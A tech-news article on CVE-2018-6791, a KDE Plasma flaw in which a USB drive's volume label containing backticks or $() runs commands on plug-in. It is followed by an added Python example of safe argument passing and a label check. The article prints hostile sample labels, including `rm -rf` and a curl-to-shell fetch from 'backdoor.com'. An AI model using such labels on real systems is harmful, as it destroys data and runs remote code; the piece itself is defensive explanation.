KDE Plasma Had A Silly But Serious Security Bug
If you are a KDE user and haven't yet upgraded to Plasma 5.12 or one of its recent point releases, you may want to do so soon, especially if your system is physically accessible to others who could plug in a rogue USB flash or memory device.
Plasma 5 versions prior to 5.12.0 are vulnerable to CVE-2018-6791, an arbitrary command execution vulnerability in the removable device notifier.
A flash drive or other USB storage device with a FAT file-system whose volume label contains `` or $() can force arbitrary commands to be executed when the drive is plugged in.
Rogue actors or pranksters could, for example, create a VFAT volume with a label such as `rm -rf` or $(curl http://backdoor.com | sh), or any number of other commands, and KDE Plasma would end up executing those commands when the device is connected to the system.
It's straightforward to exploit but obviously requires physical access to the system. The issue has been fixed in KDE Plasma 5.12.0 and is being back-ported to older Plasma releases. The CVE was made public yesterday with details via this security advisory.
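To make the bug class concrete, here is an added illustration that is not part of the article or of KDE's code: a hypothetical `mount-handler` program is given a volume label, once via string-pasted shell command (the pattern behind this CVE) and once as a plain argv element with no shell, plus a simple metacharacter check of the kind a device notifier could apply. The sample labels are constructed, not taken from the advisory.

```python
import shlex
import subprocess
import sys

# Constructed sample labels: a benign one and two carrying the `...` and
# $(...) constructs the advisory describes (harmless commands, never run here).
SAMPLE_LABELS = ["HOLIDAY_PHOTOS", "`touch /tmp/demo`", "$(id > /tmp/out)"]

# Characters a POSIX shell treats specially; a label containing any of them
# is a red flag when it is about to reach a command line.
SHELL_METACHARS = set("`$;|&<>(){}\n")


def label_is_suspicious(label: str) -> bool:
    """Return True if the volume label carries shell metacharacters."""
    return any(ch in SHELL_METACHARS for ch in label)


def unsafe_command(label: str) -> str:
    """The vulnerable pattern: the label is pasted into a command string that
    is later handed to a shell, so `...` and $(...) are expanded before the
    hypothetical mount-handler ever sees it. Returned as text, never executed."""
    return "mount-handler " + label


def safe_argv(label: str) -> list:
    """Hardened form: pass the label as one argv element and never invoke a
    shell, so the label stays a literal string no matter what it contains."""
    return ["mount-handler", label]


def shell_quoted_command(label: str) -> str:
    """If a shell really is unavoidable, shlex.quote neutralises the label."""
    return "mount-handler " + shlex.quote(label)


def echo_label_without_shell(label: str) -> str:
    """Demonstrate the no-shell path end to end: spawn a child (the Python
    interpreter, for portability) with the label as argv[1], no shell in
    between, and return what the child actually received."""
    child = [sys.executable, "-c", "import sys; print(sys.argv[1], end='')", label]
    return subprocess.run(child, capture_output=True, text=True, check=True).stdout


if __name__ == "__main__":
    for lbl in SAMPLE_LABELS:
        print(f"{lbl!r}: suspicious={label_is_suspicious(lbl)} "
              f"unsafe={unsafe_command(lbl)!r} quoted={shell_quoted_command(lbl)!r}")
```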